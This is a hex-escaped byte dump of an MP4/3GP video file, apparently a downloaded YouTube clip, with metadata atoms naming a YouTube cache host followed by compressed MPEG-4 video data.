\xEB\x6D\x65\x74\x61\x00\x00\x00\x00\x00\x00\x00\x21\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x6D\x64\x69\x72\x61

\x70\x70\x6C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\xBE\x69\x6C\x73\x74\x00\x00\x00\x19\x67\x73\x73\x74\x00\x00

\x00\x11\x64\x61\x74\x61\x00\x00\x00\x01\x00\x00\x00\x00\x30\x00\x00\x00\x1D\x67\x73\x74\x64\x00\x00\x00\x15\x64\x61\x74

\x61\x00\x00\x00\x01\x00\x00\x00\x00\x31\x31\x31\x39\x31\x00\x00\x00\x38\x67\x73\x73\x64\x00\x00\x00\x30\x64\x61\x74\x61

\x00\x00\x00\x01\x00\x00\x00\x00\x42\x42\x43\x35\x44\x41\x45\x30\x37\x48\x48\x31\x33\x34\x39\x33\x37\x31\x38\x39\x31\x39

\x32\x31\x35\x30\x33\x00\x00\x00\x00\x00\x00\x00\x00\x98\x67\x73\x70\x75\x00\x00\x00\x90\x64\x61\x74\x61\x00\x00\x00\x01

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x67\x73\x70\x6D\x00\x00\x00\x90\x64\x61\x74\x61\x00\x00

\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x18\x67\x73\x68\x68\x00\x00\x01\x10\x64\x61\x74\x61

\x00\x00\x00\x01\x00\x00\x00\x00\x6F\x2D\x6F\x2D\x2D\x2D\x70\x72\x65\x66\x65\x72\x72\x65\x64\x2D\x2D\x2D\x73\x6E\x2D\x61

\x30\x6A\x70\x6D\x2D\x61\x30\x6D\x65\x2D\x2D\x2D\x76\x32\x30\x2D\x2D\x2D\x6C\x73\x63\x61\x63\x68\x65\x37\x2E\x63\x2E\x79

\x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x9F\x26\x6D\x64

\x61\x74\x00\x00\x01\xB3\x00\x10\x07\x00\x00\x01\xB6\x10\xC3\x63\x0A\x8D\xBF\x8D\xB6\xFE\x36\xDB\xF8\xDB\x6F\xE3

\x6D\xBF\x8D\xB6\xFE\x36\xDB\xF8\xDB\x6F\xE3\x6D\xBF\x8D\xB6\xFE\x36\xDB\xF1\x36\xA1\x6E\x1B\x17\x50\x91\x96\xE1\xB1\x73

\xCE\xCB\xD9\xDE\x58\x49\x51\xBA\x59\xA4\xAA\xCF\xA2\x3A\x2E\xD0\x93\x0E\x7C\x6C\x5D\x42\x4A\xD3\x93\x16\xE1\xB1\x75\x09

\x19\x6E\x1B\x17\x3F\x7E\x48\xCB\x70\xD8\x52\xCB\x70\xD8\x53\x9C\xE8\x65\xB8\x6C\x29\xA1\x05\xAE\xF1\x4A\xFC\x52\x8A\xA2

\x44\x8F\x87\xBA\xCD\xB5\x7E\xB4\xB2\x1B\x58\x8F\xE6\xE1\xFB\x5D\x50\xA5\x72\x8D\x42\x26\x82\xDC\x36\x14\xC8\xE0

\x3D\x2D\xE9\xA5\x85\x09\x7C\x8C\xB7\x0D\x8B\x9F\x94\xE1\xB0\xA7\x69\x24\x6A\x70\xD8\x52\xD4\xE1\xB0\xA5\xBE\xCD\xCB\x70

\xD8\x53\x94\xE1\xB0\xA5\xA1\x82\x79\xF9\x1A\x97\x35\x2E\xCF\x92\x35\x2E\x6A\x5C\xF7\x8B\x2A\xDE\x1D\xB9\xB2\x90\xD1

\xFB\x92\x4E\x86\x41\x26\x60\x29\x77\xBE\x6C\x6E\xEA\x0B\x24\xE7\x0D\x10\xC2\x9D\x02\x14\x68\xD9\xF2\xBF\x48\x44\xDC\xB7

\xE0\x42\x8D\x39\x6E\xF4\x6D\x46\x93\x3E\x2F\x63\x37\xD5\xFA\x81\x46\x0F\x7A\x36\x39\x83\xD3\x41\x5C\x97\xC1\x8F\xE1\x06

\x2C\x4F\x7B\xE6\x68\xDA\xFB\x29\x2A\xE1\x33\x0F\x99\x51\x9D\x66\x29\x43\x73\xD0\xED\x4B\x90\xB6\xCF\xA0\x58\x1B\xD0

\xAB\xEE\xB1\xE5\xBE\xDC\xCB\xC4\x57\x64\x58\x51\xF5\xCB\x3E\xB8\x32\x91\xE6\x03\x01\x59\x4A\x27\xF4\x32\x30\x9B\x05

\xEA\x95\xD5\x0D\x5E\xD4\x68\xAC\x0A\x7E\x46\x7F\x1F\x29\xA4\x85\x07\xBE\xD7\x8F\x36\xE5\x8F\x37\xF8\x0B\xCD\x82\xAD\x20

\x73\x69\x47\xB4\x24\x9F\x17\xB1\xF6\xE3\x50\xB7\xB4\xDC\x92\x22\xE9\x39\xB2\xCE\x50\x60\x29\x09\x4B\x3A\x14\xA1\x93\xA8

\x9B\x5C\x18\xA2\x60\x64\x75\x94\x4C\xD2\x49\x8C\x00\xD3\x76\xCE\xB3\x4D\xEF\x2E\xA2\xE9\x04\x88\x0D\x4B\x73\x66\xD9

\xAB\x76\xFF\x5F\xAE\x4C\xCB\x93\x08\x97\xC5\x1A\xF6\x7B\xB3\xD3\x93\xA1\x32\x68\x82\xCA\xDA\x78\x68\x3D\x4A\xCB\x53\xC5

\x96\x4E\xDB\x2A\xD2\x85\x2A\x05\xE6\x44\xB0\xEB\xC0\xAF\x09\xB5\x12\xA3\x04\xC3\xD4\xBF\x57\x26\xB3\x6C\x5D\x62\xA9\x05

\xCE\x0A\x87\x12\x03\x07\x7E\x29\xA1\x93\xFC\x82\x7F\x8C\xCB\xE7\x6D\x0D\x30\x27\x69\x2B\xCE\xDA\x1A\x06\x0F\xB4\x58\x79

\x26\x76\x7C\x35\x3C\x4D\x22\xA5\x09\x4B\x71\x68\x59\xB2\xC1\xA6\x11\x97\x8C\x82\xBE\x05\x04\x1A\x85\x62\x67\x91\x89

\x9B\x69\x63\x7D\xBB\xC7\x9F\xD7\x8F\xB7\xE5\x16\xCD\xD9\x6C\x5B\xF6\xA1\x51\x08\xD6\x8D\xF9\x4F\x31\xAB\x74\xA6\x10\xD7

\x5B\x9B\x97\x3D\xBC\xE0\xD3\x28\xCC\x6F\x1B\x5A\x77\x61\x6C\xE9\x2F\x42\xD4\x56\xCB\x29\x67\xB9\x0B\x32\x76\x2C\xA7\xE7

\x1D\xF2\x55\x39\x3A\xAA\x29\xEA\x0B\xA4\x51\x55\xA6\x1C\x16\x7F\x57\x86\x97\x3D\x71\x3F\x14\x0D\xF7\x92\xF0\x3C\x47\xD1

\x4D\x19\xBE\x1E\x0D\xC7\xD4\x33\x3F\xCD\x57\x7D\xD4\x39\xE7\x15\x6B\xD7\xDB\xFE\xB2\xDB\x65\x50\x3B\x40\xB9\x02\x3F\xF9

\x6C\x5D\xA0\xC2\x9D\x31\x7E\xCE\x6A\x8E\x49\x79\xCE\xFF\x48\x1D\x68\x6C\x5E\xF3\x56\x84\xED\xA1\xB8\x7D\x84\x35\x87\x00

\xAF\xA1\x42\x7B\xBF\xF3\x57\x55\xDC\x5A\x81\x4E\xAD\x01\x36\x37\x6D\x64\xBB\x79\x19\x9A\x20\xF2\x6A\x29\x54\x12\xAC\xA7

\x38\x42\x42\x03\xFF\x57\x13\x02\xD2\x62\x50\xF1\x9D\x6D\xA4\xF7\xDC\x55\x3F\xDE\xDB\x22\x92\x88\x8E\xC3\xE6\x33\x62

\x9E\x67\x49\x49\x85\x6A\xD5\xAB\xA2\x50\x7F\x00\xC3\x2C\x7F\x9F\x44\xBC\xEA\x8E\x9A\x45\xB8\xF3\xE1\x01\xBD\x67\xD7

\xFF\xE7\x54\xEE\x76\x08\xB3\x39\x43\x37\xD5\x5E\xD8\x4C\x56\x5F\x27\xD2\xB6\x41\x50\xD0\x38\xAA\xBC\x57\xFD\x51\x87\xC6

\x8D\xA5\x53\x47\xF6\xAD\xD4\x91\x12\x2E\xE2\x9C\x07\x15\xBA\x97\xD5\xCF\x0B\xD4\x08\x14\x19\x18\x3B\xD4\x29\xCD\x23\x13

\x2A\x24\x77\x35\xB2\x5C\x9C\x19\x3C\x66\x5C\x9C\x41\x1D\xD9\x81\xD7\x98\xF8\xCE\xF7\x3B\x42\x45\x58\xDB\x12\x6F\x8D\xB6

\xE7\x1E\x6F\xFC\x1A\xE4\x31\xBA\x3E\xC3\x41\x26\xC0\xB4\xCA\x79\xAC\x2B\xCF\x2F\x72\xCE\xA9\xD5\xFA\x37\xA1\x22\xE3\xA6

\x76\xB2\xA3\x79\x65\xCE\xA2\x45\xC0\x94\xB0\xE5\x56\xCF\x26\xDD\xC0\x54\x29\x53\xB4\xD4\x0F\x6C\x8B\xD2\x24\xB3\x1A\x61

\xB1\xC4\x61\x46\xA8\xEA\x99\xEC\x93\x61\x26\xAF\x6F\x10\xB9\xAF\x49\x1F\x62\x3D\xB8\x06\xBE\x1E\x4E\xF1\x6B\x86\x10\x67

\x3A\x32\x62\xA8\xA0\xA9\xEA\xC7\x53\x8C\x56\x58\xCF\xE6\xD9\xD8\x36\x13\xAC\x06\xBD\xB7\x94\xB5\x42\x8B\xDE\xFE\xF5

\x4C\x22\x8B\x75\x3F\x66\x28\x67\x9D\xCF\xE7\x37\xB0\xAE\x4D\x46\x4E\x93\x7F\x54\xCE\x28\x46\x6A\xC2\x08\x61\x23

\x1A\x9B\x0A\x94\x37\xB8\x37\x25\x5C\x2A\xF9\xBC\xCF\xB1\xB9\x33\xF3\x2A\x29\x17\x58\x54\x59\x36\x59\x44\xD5\x90\x73\x87

\x8B\x30\x9A\x2A\xD2\xFC\xAB\xCC\x50\x9D\xAC\x05\x45\x9B\xEB\xC2\x85\xF0\x69\xB1\x65\x89\x20\x50\x4B\x7D\x6A\x7B\xF1\x13

\x58\xC6\x38\x87\x14\x6D\xFF\x49\x7B\x56\xE1\x32\x98\x0B\xE1\x9C\x50\x25\x2B\x8A\x7B\x97\x2E\xF8\x93\x2D\xCB\x8E\xE2\x47

\x31\x32\x60\x54\xEB\x61\x9E\x83\x04\x83\x01\xFF\xC7\x09\x1B\x49\x46\xFD\xC2\xC2\x56\x94\xF4\x5C\x14\x1A\x48\x5E\xA1\x37

\x39\xDA\x99\xBC\xDC\x25\xCD\xB7\xB0\xA6\x15\x89\x97\x80\x90\xD9\xA2\xF6\x47\x19\x09\x6F\x06\x68\x1C\x92\x55\x59

\xAA\xBA\xA3\x8D\xC8\xA4\x31\xB0\x95\xC2\x81\xFF\x8B\x53\x6A\x89\xDA\x55\xB0\x6A\x89\x74\xBF\x55\x4B\x51\x95\xE0\xC9\x42

\xD1\xEE\x40\xE0\x97\x6A\x4B\x1E\xB8\x1E\x6B\x8D\xB7\xA1\xB7\x05\xEE\x37\x16\xBC\x13\x30\x81\xFB\x59\xFE\x08\x85\x9B\xA4

\xA3\x7C\x71\xE4\xC6\xDE\x69\x63\x79\xBE\xC5\x6F\x53\xEF\x47\xBD\xB4\x90\x1C\x50\x13\xEC\x47\xF2\x98\x0E\x50\xE4\xFC\x88

\xC9\x68\x61\x1C\xDD\x9C\x6C\xBB\xFF\xFC\xE2\x89\x14\x49\xDD\xA8\x46\x47\xC5\x8C\x2D\xE2\xC6\x7F\x9F\xFC\x45\x64\xDB\x79

\xC4\x3D\x21\x23\x85\x72\x5B\xDC\x2D\xF4\xED\x80\xE3\x47\xD7\xF6\xAA\x0F\xD4\x42\xDD\xD2\xCB\x66\xDD\x59\x44\x88\xB8

\x8D\x4D\x14\x4C\x36\x23\x9F\x51\x93\x33\x2A\xCB\x11\x57\x54\xDD\x2A\x2B\x83\x70\x4C\xD2\xD9\x27\x25\xE0\x62\x14\xC6

\x2D\xBF\xB5\x15\x5D\x74\x76\xA2\x09\xA1\xD6\x13\xA6\xE4\xB2\x48\xA7\x33\x21\x3D\xB4\x06\x5B\xA1\xED\x03\x1B\xCE\x70

\xAB\xF3\x9D\xEF\x44\xF5\x5B\x88\x6E\x42\x45\xDE\x83\x57\x25\x51\x10\xF6\x91\x30\x9F\x82\x92\xFC\x3F\x9F\x35\x13\x17

\xAB\x4C\xD2\xB9\x07\x33\xB7\x38\x0E\x23\x81\x03\xD3\xCA\x0B\x32\x79\x0E\x48\x79\x3C\xD1\x05\x89\xF4\x43\x79\x40\x96

\xDC\x09\x8B\xA0\x3A\x61\xFC\xB4\x37\x0B\x73\x84\x46\x63\x41\xF7\x57\x5B\x7B\xDB\x56\xE5\x88\x86\x27\x69\xAA\xA5\xA9\x41

\xC8\xAD\x81\x31\x6F\xE7\xDB\x97\x16\xCC\xAB\x54\x2F\xD9\x62\x31\x7A\x37\x9D\x07\x7E\xDD\xA2\x76\x21\x03\x01\x7F\x83\x06

\x80\xE2\xB3\x11\x32\xF8\x73\x95\x6B\xEF\xF3\x4A\x17\x17\x3F\x04\x00\x64\x7A\x0C\x0A\xE0\x71\x59

\x8F\x8D\xBC\xED\x8A\xDB\xA7\xF9\x45\x9F\x52\xFF\x94\x8A\xE3\x87\xD5\xE8\xA8\x5A\xD7\xB0\x8B\x49\x4D\xD2\x3D\x67\x4E\x50

\xE3\x09\x41\x1D\xEF\x13\x5C\x3D\x1C\xB4\xDB\x7B\xCA\x59\xE8\x38\xB1\x7D\xA2\x28\x79\x16\xF6\x53\x74\xF0\xBF\xD7\x2F\x87

\x39\xEE\x6D\xEA\xC3\x6D\x59\x00\x2F\x82\xA0\x2A\x93\x01\x00\x70\x7A\xD8\x3E\x6F\xFF\x7E\x0F\x12\x62\x2F\x55\xCD\xB2

\xAE\x83\x94\xB6\xFC\xEA\xB6\x6E\x07\xBC\x06\x47\x7B\xE9\xBC\xF1\x28\xC0\x6B\x12\x72\xD2\xAF\xE0\x6A\xA2\xEC\x86\xD6

\xBB\x0E\xA7\x89\x98\xC1\xB6\x22\xC9\x83\x7F\x8D\xA2\x28\xB9\x9C\x1F\x35\xDB\x54\x23\x9C\xAB\xEA\x21\xAC\x3A\xE7\x85\xE5

\xB3\x30\x73\x38\x88\x40\xE8\xCD\x4C\x0A\xD2\xE7\x2F\x60\xD3\x87\xCC\x07\x02\xFD\x09\x70\x80\xD1\xA0\x76\xE8\x4B\xA8\xB6

\x79\x50\xAD\x4D\x11\xBE\x1E\x82\xCC\x34\x14\xD5\x61\xAD\x9C\xB9\xD9\x49\x68\x4A\xF9\x70\xD6\x34\x38\x2C\xC1\xB4\xB4\x63

\x75\x48\x52\xB6\xF7\x77\x99\x20\x9E\xA2\xA6\x31\x16\x0B\xF4\x25\xC1\xF3\x5D\xEA\x85\xCA\x74\x25\x66\x5F\x8B\xA3\x15\x54

\x8B\x1E\x51\x8B\xA3\x7A\x50\x59\x86\x85\xEF\xA1\xC7\x91\xF0\x5F\xA1\x2C\x4B\x0A\x2A\xD3\x34\x97\x14\x37\x16\xEF\x4D\x51

\x8C\x5C\xF3\x61\x23\x0A\x80\xB7\xA6\x2D\xCE\xAF\xDE\x14\xDB\x5F\x8B\x30\xD0\xBE\x84\xB4\x20\x34\x6A\x83\x0C\x5B\xE0\xC1

\x49\xE4\x71\x4C\xDC\x96\x61\xA1\x7B\xD9\x66\x1A\x17\xBF\x82\xB1\xA9\x37\xAA\x56\xE2\x8D\xB8\x0B\x12\x8B\x08\x99\x66

\x1A\x0A\x59\x66\x1A\x17\xBF\xE9\x89\x65\x98\x68\x29\x65\x98\x68\x29\xA9\x4F\x96\x59\x86\x82\x96\xA3\x0D\x05\x33

\x8C\xAB\x6D\x64\x6D\xB7\x97\x1B\x6D\xFC\x6D\xB7\x78\xDB\x6E\x71\xB6\xDF\xC6\xDB\x7F\x1B\x6D\xFC\x6D\xB7\xF1\xB6\xDF\xC6

\xDB\x73\x7F\x00\x00\x01\xB6\x51\xE2\x07\xFF\xB8\xAE\x0A\x72\x5C\x7C\xB3\x61\xAF\x28\x8A\x47\xA6\x5D\x77\x2E\x56\x38\xF8

\xE3\x17\x2B\x95\xD5\x85\x24\x7C\xBF\xCB\xE5\xE5\x55\x7D\x8C\x56\xFB\xEE\xAE\x5F\x75\x7D\xF2\x5F\x3B\xA5\x0B\xBD\x3D\x36

\x2D\x47\x14\xD9\x76\x6D\xA5\x26\xF7\xC5\xEF\xF7\x49\xF7\xDA\xF5\xA7\x92\xE9\x2B\xFE\xC6\xAC\x4F\xF2\x81\x6A\xD8\xD8

\xEF\x4B\x05\x64\x27\xBA\x8D\x64\x25\x75\xE1\x80\x84\x2C\x2A\x68\xFD\x06\x27\x09\x77\x97\x16\xD7\x6E\xD1\x69\xA9\xD0\x49

\xD7\x9B\x3F\xCB\xFC\x9B\xB6\x56\xFA\x1A\x90\x11\x14\xFD\x67\x21\xE5\x5F\x57\x15\x0F\x35\xAF\xD5\x04\x3A\x75\x29\x4B\xC4

\xB9\x83\xF5\x64\x62\xAB\x6D\xDB\xA6\xF7\x24\xD8\xAF\x7D\xF7\xCB\x0D\x48\xA0\xF2\xB4\xCE\x1B\xF9\x31\x3B\xEE\xB3\xA5\x59

\x29\x84\xAE\x7F\xFF\x7F\x00\x00\x01\xB6\x52\xC2\x27\xFF\xBA\xB8\x37\x2A\xC3\x70\xD9\x3F\x2B\x45\x2C\x11\xB8\x57\x70

\xDD\x52\x6B\x9E\xDE\x9E\x75\x71\x37\x15\x4C\x68\x32\x59\x42\x87\x15\xEF\xA9\xB4\x18\x8C\x94\xCD\x96\xA1\xC1\x83\xD9\xD0

\x4D\x09\x64\x15\xAF\xEB\x02\xC2\x42\xC1\xEA\x17\x0A\x4D\x2A\x74\xA2\xEF\x5B\x01\x2C\x6C\x13\x2E\x93\x64\x83\x34\xCD\xB5

\x0D\xC9\x26\x6C\xBB\x2F\xC7\xA2\x9E\x16\x08\xF8\x94\xDF\x17\x6B\xF6\xA8\x58\x46\xE3\xCC\x73\x65\xF3\xE0\xA2\xA9

\xDE\xDE\x75\xB6\x86\xE5\x83\x31\x69\x32\xE6\x8B\xAD\xFC\x19\x2D\xCC\x59\xB1\x82\x98\x26\x48\xCA\x51\x76\xE2\xAC\x26\xF4

\xD4\x94\x94\x2B\x01\xA9\x34\xC4\x29\xC8\x56\xBD\xAD\xC1\x99\x13\x33\xF0\x16\xE6\x30\x8C\x14\x4C\xA4\x18\xCC\x12

\xBF\xDA\x3C\xAC\x0E\xF2\x14\x15\x9E\x7B\x12\xE9\xA7\x91\xBA\x39\x11\xCF\x83\x14\xFA\x8C\xD3\x24\x1C\x51\x7E\x08\xD2

\xCE\xF8\x2E\xB3\xDB\x00\xA5\x06\x1B\x0B\x08\x94\x34\xAD\xF9\x48\xE5\xD8\x4E\xC2\x8D\x67\x85\xA6\x8D\x31\x3F\xAB\x54\x07

\xBF\xFF\x13\x0A\xFB\x86\xA1\x61\xCB\x80\x53\xB9\x07\xF9\x53\x69\xB1\x31\x36\x18\x0F\x61\x7D\x87\xC8\xC6\x6C\x39\x21

\x1B\x19\x20\x31\xA5\x2A\x72\xC9\x90\xCD\x68\xD9\x93\x55\x10\x90\x25\xC5\x10\x7A\xDA\x91\xD2\x3F\x5D\x9F\x44\x7E\x51

\x1A\xED\xE3\x63\x45\xD4\x20\x8F\xFF\x04\x95\x4A\x95\x83\x33\xEE\x7D\x3A\xCF\x04\xBB\x82\x90\xC2\x14\x53\xF3\xA7\x67\x26

\xDE\x48\xDE\x84\x64\x57\x83\x2C\xA9\xC8\xD5\x0B\x73\xDB\x1B\xBB\xDE\x24\x31\x33\x04\x17\x94\xA6\x16\x81\xE1

\x3F\x7D\x5E\x0E\xB3\x6D\xE8\xCF\x86\x5D\xB2\xD5\x54\xB6\x52\x95\x48\x89\x89\x28\xB7\xD2\xA6\xB0\x8F\xFF\xEF\x00\x00\x01

\xB6\xE5\xE2\x27\xFF\xBA\xF5\x85\x26\x71\x77\x17\x71\x58\x16\x28\x9B\xBD\x43\x4F\x38\xA5\xB8\x4A\xF3\xF2\xBE\xE1

\xAE\x5E\xEA\xEA\xEA\xFB\x19\x3B\xED\x38\x84\x30\x75\xEF\xA9\x9C\x30\xAB\xE9\x9D\x34\x99\x8F\xD6\x6F\xAC\x5D\xCB\x40\x28

\xED\x3C\xBC\xF6\x68\x1C\x03\x88\x98\x3C\x49\x04\xCC\xDA\x98\xB4\x50\xA2\x3F\xFB\xC7\xE0\x89\xA4\x6B\x78\xD3\x9F\xB8

\xAE\x15\x6D\xC0\x49\x84\x6B\x50\xA9\x72\x03\x57\x81\x67\x25\x89\x68\xC0\xC8\x34\xA5\x8D\x72\x95\x14\xBF\xE5\xFE\x80

\x6D\x50\xEF\x37\xAD\x0B\x3F\x27\x47\x4F\x23\xA9\xCA\x72\x88\x8D\x72\xB0\xB1\xDF\x45\x99\x51\x29\x41\x60\xBC\x14\x56\x29

\xDF\xEF\x51\xF9\xB2\xC7\xA9\x03\x73\xEB\xEA\x0B\x14\xC1\x81\x9C\x35\x34\x47\x63\x0E\xA8\xCE\xD8\x95\xEA\xA8\x1B\x4B\x05

\xF2\xAB\x82\x52\x82\xFF\x88\xCA\x64\xFA\x4B\xCD\xA2\xF4\x4D\x3C\x4B\x12\x4B\x80\xF5\xDF\x74\xBB\xF3\x7D\x5B\x9D\x84\xE7

\xDD\x6E\x57\x73\xED\xD5\x29\x3B\x05\x21\x6B\xD5\x49\xBD\xD7\x2A\x57\x54\x00\x51\x1A\x35\x39\x16\xEA\x99\x77\xF9\x75

\x4C\x95\xB2\x3D\xFD\xCC\x8C\xFF\x89\x3C\x68\xCC\xBC\x45\x07\x0E\x25\xB6\x52\x5F\x76\x8F\x65\x59\x12\x22\x2A\x07\xE4\x95

\x55\x69\x5D\xF3\x6D\x6B\x88\xA1\xC2\x93\x4F\x9E\xB0\x0D\x5D\xCC\xC4\x89\x05\x98\x68\x52\xF9\xD2\x0C\x29\x90\x99\xB5

\x7A\x1F\x11\x9F\x34\xD2\xCE\x8C\x9A\xC4\x31\x83\x2A\x78\xE9\x2C\x13\x82\xF0\x4A\x09\x7B\xF0\x7B\xE5\x0C\x3E\x7B\xDE\xF6

\xA8\xE6\xF6\xF4\x73\xA3\x24\xB2\x6E\x41\xC3\x17\x90\xF1\xF3\x8E\xAD\xFB\xDD\x5A\x98\x94\x87\x20\x75\x1C\xE2\x80

\x2E\x8F\x21\xC8\xAB\x70\x76\x50\x2E\xAD\x9C\xFF\xEF\x00\x00\x01\xB6\x54\xC2\x67\xFF\xBA\xF2\x41\xC2\x22\x42\xB6\xC5\xC1

\x7B\x9C\x1B\xB8\xBA\xC1\x4C\x2A\x63\x97\x68\x8B\x41\x55\xA3\x07\x49\xA2\x9F\x38\x4B\x3B\xAD\x83\x0C\x8A\x17\xC2\x30

\x2B\x60\x21\x1A\x7A\xE8\xC2\x17\x63\x5B\xD4\x42\xD0\xA9\xB5\xC6\x2C\x05\x4E\x3A\x69\x93\xF7\x75\xB0\x1C\xA2\x36\x6E\x32

\x88\x58\x02\x0F\xB2\x77\xFC\xFA\xC8\x45\xCC\x5B\xBA\xDF\x95\x81\xAF\x81\x47\xA1\x38\x31\xA1\xBB\xC5\x2A\x81\xC1\x50\xD4

\x14\x2E\x0B\xD0\xD4\x58\x5B\x3E\x3A\xB2\x7C\x60\x34\x21\xCE\x61\x69\x84\xCC\xFD\xA4\x9B\x06\x5E\x1E\x97\x45\x34

\x7A\x0C\xD5\x8A\x48\x4A\x18\x3E\x86\x17\xF6\xC9\x9D\x6D\xA2\x52\x4E\x10\x0F\x92\xAC\x9A\xA4\x0B\x28\xC4\x22\xDD\x6C\xF2

\xFC\x58\x8F\xD5\x84\xA0\xC5\x0F\xDC\x19\x04\x3C\x2A\xAD\x1B\x51\x47\xED\x8D\xA8\xC8\x29\xB5\x65\x93\x41\x89\xD8\xE2\x12

\x13\x11\x8F\x95\xB6\xAB\x6B\x5F\x06\x38\x78\x7C\x24\xCB\x6F\xB1\x2A\x4E\xB9\x20\x59\xA7\x88\xF5\x6F\xB0\xFF\x6D\xB2

\x8E\x87\x7C\xE0\x88\xA4\x76\xD5\x2D\x21\x9C\xFC\x64\xF1\x1A\x4A\xD4\xBC\xD1\x70\x79\xC1\x56\x74\x34\x16\xA6\xAB\x21\x46

\x2D\xD6\xC1\x86\xA4\x23\x30\xB6\x4D\x05\x19\x65\xBE\x9E\xED\x97\xBE\xC1\xE8\xEF\xDE\x59\xCC\x05\x31\xF8\xFD\x57\xB2\x09

\x63\xE5\x72\x89\x56\xE6\x2C\xAE\xEF\x09\x2C\x70\xFB\x84\x5A\x0A\x14\xFC\x3E\x63\x6F\x98\xD3\x49\x30\xF4\x69\x8E\x23\xE3

\x63\x51\x82\xD6\x16\x25\x05\x13\xCF\x9E\x35\xC8\x98\x81\x64\x57\x73\xCA\x53\x9D\x33\x18\x72\xEE\xCB\xBD\x67\x66\x9C\xD1

\xDE\x64\x11\x95\xA9\xA0\x4F\xD6\x58\x52\x34\x97\x89\x05\xB1\x55\xA0\x44\x7B\xA0\x4A\xF8\x5A\x44\x45\x26\x20\xB3

\x3E\x5F\xF0\x34\x08\x6A\xF4\x47\x65\x65\x87\x1A\x63\xB2\x72\x01\xC6\x40\x83\x64\x44\xE8\x0E\x2A\xF0\xCF\x99\xF1\x09\xA9

\xC7\xB8\x33\x89\xE5\xDE\x9D\x77\x14\xF9\x22\x0E\xBF\x83\x90\x33\x86\xB8\x74\xE7\xF8\x98\x15\x67\xD6\x81\x51\x5D\x44\x10

\x73\x6F\x49\x0A\x5B\x70\xD2\x92\xF2\x03\x19\x64\x5B\xFF\x66\x7B\x5A\xCE\x13\x38\xB7\x6B\xDC\x34\xE9\xE6\x6A\xE4\x05\x61

\x01\x98\x90\xE3\xF5\xF6\xE8\xEE\x81\x31\xD8\x0F\x7B\xFF\xF7\x00\x00\x01\xB6\x55\xE2\x27\xFF\xBA\xF2\x4C\x54\x21\x15

\xDB\x1A\x5C\xF9\x1E\xB6\x4F\xCD\x11\x22\xD2\x06\xF3\x05\x4C\x09\x16\x81\x11\x59\xFB\x4E\x0A\x4E\x12\xFC\xFA\x82\x5D\x82

\x03\xD2\xF5\x00\xE4\xF1\x47\x62\x58\x5A\xE1\xBC\x28\x94\xE4\xDD\x66\xEC\x27\x1C\x16\x8C\xFA\x48\x34\x37\x54\xE7\xB2\x76

\x64\xCB\x4F\xAC\x47\xA2\xC3\x3D\xC2\x8F\x50\x61\x79\x2C\xA5\x2E\x74\x91\xA4\x4E\x4E\xE3\xBD\xF1\x92\x07\x5D\x60

\xEB\xDF\x05\x20\x15\x06\x28\x0C\xCD\xBC\xD1\x11\xFB\x74\x23\x25\xFB\xA3\x51\xA1\x9A\x71\xB9\x43\xA1\xF2\xC7\x7A\xB4\x90

\xF1\x0E\xE8\x39\xB0\x75\x13\xF6\x5C\xF7\x34\xB1\x73\xC3\x7D\x1A\x00\xB7\x30\x74\x69\x80\xA5\x65\xCA\xA5\xA0\x75\x03\x43

\x93\x4A\x79\xA7\x97\x94\x67\x02\xB5\xC8\x37\x15\x10\x77\xEF\xB6\xA9\x29\x43\xCF\x2A\xF8\x1B\x55\x00\xAD\x19\x19\xAD\x77

\x8F\x4C\x95\xDE\xE8\x19\xB3\x35\x64\x24\x3C\xC2\x54\xEC\x6F\x05\x61\xD1\x13\x12\xE2\x86\xB8\x29\xAC\x8B\x13\xA1\x67\x90

